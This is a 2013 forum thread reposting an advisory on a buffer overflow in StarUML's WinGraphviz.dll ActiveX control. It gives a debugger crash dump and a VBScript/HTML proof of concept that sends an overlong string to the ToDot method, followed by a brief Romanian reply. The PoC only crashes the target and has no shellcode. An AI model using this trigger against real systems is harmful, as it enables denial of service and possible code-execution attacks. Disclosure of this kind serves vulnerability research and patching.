Matt Posted August 4, 2013 Report Posted August 4, 2013 Description : # Exploit Title: StarUML WinGraphviz.dll ActiveX buffer overflow vulnerability# Date: 03.8.2013# Exploit Author: d3b4g# Vendor Homepage:StarUML - The Open Source UML/MDA Platform# Software Link: StarUML - The Open Source UML/MDA Platform# Tested on: Windows XP SP3Author : d3b4gSource : StarUML WinGraphviz.dll - ActiveX Buffer Overflow VulnerabilityCode : About StarUML--------------StarUML is an open source project to develop fast, flexible, extensible, featureful, and freely-available UML/MDA platform running on Win32 platform. Exception Code: ACCESS_VIOLATIONDisasm: D98439 MOV DL,[EBP] (WinGraphviz.DLL)Seh Chain:--------------------------------------------------1 6B47D959 VBSCRIPT.dll2 772FE115 ntdll.dllCalled From Returns To --------------------------------------------------Registers:--------------------------------------------------EIP 00D98439 -> Asc: http://test\test\test\te?s\test\test\tes\ttest\tesEAX 00894119 -> Asc: http://test\test\test\te?s\test\test\tes\ttest\tesEBX 0020D70A -> 00000038ECX 00894119 -> Asc: http://test\test\test\te?s\test\test\tes\ttest\tesEDX 000003FFEDI 000003FEESI 00000000EBP 00000000ESP 0020D618 -> 00000059The example code below triggers the vulnerability-------------------------------------------------<object classid='clsid:1F25D86C-95BC-4E33-A177-EE8DABEF8B04' id='target' /><script language='vbscript'>targetFile = "C:\Program Files\StarUML\WinGraphviz.dll"prototype = "Function ToDot ( ByVal Source As String ) As String"memberName = "ToDot"progid = "WINGRAPHVIZLib.NEATO"argCount = 1arg1="http://test\test\test\te?s\test\test\tes\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\"target.ToDot arg1 </script> Quote
Andrei Posted August 4, 2013 Report Posted August 4, 2013 Nu cred ca e foarte important. Din cate am vazut e multisoara bataie de cap sa-l reproduci. Quote